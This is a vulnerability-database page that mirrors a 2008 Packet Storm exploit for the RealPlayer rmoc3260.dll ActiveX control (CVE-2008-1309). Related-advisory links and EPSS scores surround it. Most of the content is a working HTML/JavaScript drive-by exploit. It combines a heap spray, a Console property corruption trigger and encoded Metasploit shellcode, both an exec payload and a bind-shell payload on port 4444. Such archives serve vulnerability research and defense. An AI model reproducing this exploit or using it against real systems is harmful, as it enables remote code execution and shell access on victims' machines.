Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormElazar BroadPACKETSTORM:65089
HistoryApr 02, 2008 - 12:00 a.m.

realplayer-activexexec.txt

2008-04-0200:00:00
Elazar Broad
packetstormsecurity.com
14

0.962 High

EPSS

Percentile

99.4%

JSON
`<!--   
Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit(Heap Corruption)  
written by e.b.  
Tested on Windows XP SP2(fully patched) English, IE6, rmoc3260.dll version 6.0.10.45  
Thanks to h.d.m. and the Metasploit crew  
-->  
<html>  
<head>  
<title>Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit</title>  
<script language="JavaScript" defer>  
function Check() {  
  
  
  
  
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com   
var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +  
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +  
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +  
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +  
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +  
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +  
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +  
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +  
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +  
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +  
"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +  
"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +  
"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +  
"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +  
"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +  
"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +  
"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +  
"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +  
"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +  
"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +  
"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +  
"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +  
"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +  
"%u314e%u7475%u7038%u7765%u4370");  
  
// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com   
var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +  
"%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a" +  
"%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241" +  
"%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c" +  
"%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f" +  
"%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c" +  
"%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f" +  
"%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b" +  
"%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c" +  
"%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31" +  
"%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35" +  
"%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b" +  
"%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663" +  
"%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733" +  
"%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470" +  
"%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358" +  
"%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f" +  
"%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458" +  
"%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58" +  
"%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f" +  
"%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275" +  
"%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45" +  
"%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033" +  
"%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046" +  
"%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035" +  
"%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036" +  
"%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64" +  
"%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35" +  
"%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67" +  
"%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30" +  
"%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f" +  
"%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246" +  
"%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139" +  
"%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652" +  
"%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e" +  
"%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b" +  
"%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075" +  
"%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251" +  
"%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f" +  
"%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f" +  
"%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b" +  
"%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952" +  
"%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73" +  
"%u684f%u3956%u386f%u4350");  
  
  
var bigblock = unescape("%u0C0C%u0C0C");  
var headersize = 20;  
var slackspace = headersize + shellcode1.length;  
while (bigblock.length < slackspace) bigblock += bigblock;  
var fillblock = bigblock.substring(0,slackspace);  
var block = bigblock.substring(0,bigblock.length - slackspace);  
while (block.length + slackspace < 0x40000) block = block + block + fillblock;  
  
  
  
var memory = new Array();  
for (i = 0; i < 400; i++){ memory[i] = block + shellcode1 }  
  
var buf = '';  
while (buf.length < 32) buf = buf + unescape("%0C");  
  
var m = '';  
  
m = obj.Console;  
obj.Console = buf;  
obj.Console = m;  
  
m = obj.Console;  
obj.Console = buf;  
obj.Console = m;  
  
  
}   
  
</script>  
  
  
</head>  
<body onload="JavaScript: return Check();">  
<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="obj">  
Unable to create object  
</object>  
  
</body>  
</html>  
`

Related

securityvulns 2
checkpoint_advisories 1
packetstorm 1
redhatcve 1
cve 1
prion 1
nessus 3
d2 1
cert 1
zdi 1
securityvulns
securityvulns
ZDI-08-047: RealNetworks RealPlayer rmoc3260 ActiveX Control Memory Corruption Vulnerability
2008-07-26 00:00:00
RealPlayer multiple security vulnerabilities
2008-07-31 00:00:00
checkpoint_advisories
checkpoint_advisories
RealNetworks RealPlayer rmoc3260.dll ActiveX Control Memory Corruption (CVE-2008-1309)
2010-03-23 00:00:00
packetstorm
packetstorm
realplayer_console.rb.txt
2008-04-02 00:00:00
redhatcve
redhatcve
CVE-2008-1309
2015-10-30 10:21:02
cve
cve
CVE-2008-1309
2008-03-12 17:44:00
prion
prion
Design/Logic Flaw
2008-03-12 17:44:00
nessus
nessus
RealPlayer ActiveX (rmoc3260.dll) Console Property Memory Corruption Arbitrary Code Execution
2008-03-12 00:00:00
RealPlayer for Windows < Build 6.0.14.806 / 6.0.12.1675 Multiple Vulnerabilities
2008-07-28 00:00:00
RealPlayer for Windows < 6.0.14.806 / 6.0.12.1675 Multiple Vulnerabilities
2008-08-04 00:00:00
d2
d2
DSquare Exploit Pack: D2SEC_REALCONSOLE
2008-03-12 17:44:00
cert
cert
RealNetworks RealPlayer ActiveX controls property heap memory corruption
2008-03-11 00:00:00
zdi
zdi
RealNetworks RealPlayer rmoc3260 ActiveX Control Memory Corruption Vulnerability
2008-07-25 00:00:00

0.962 High

EPSS

Percentile

99.4%

JSON
Related for PACKETSTORM:65089
securityvulns2checkpoint_advisories1packetstorm1redhatcve1cve1prion1nessus3d21cert1zdi1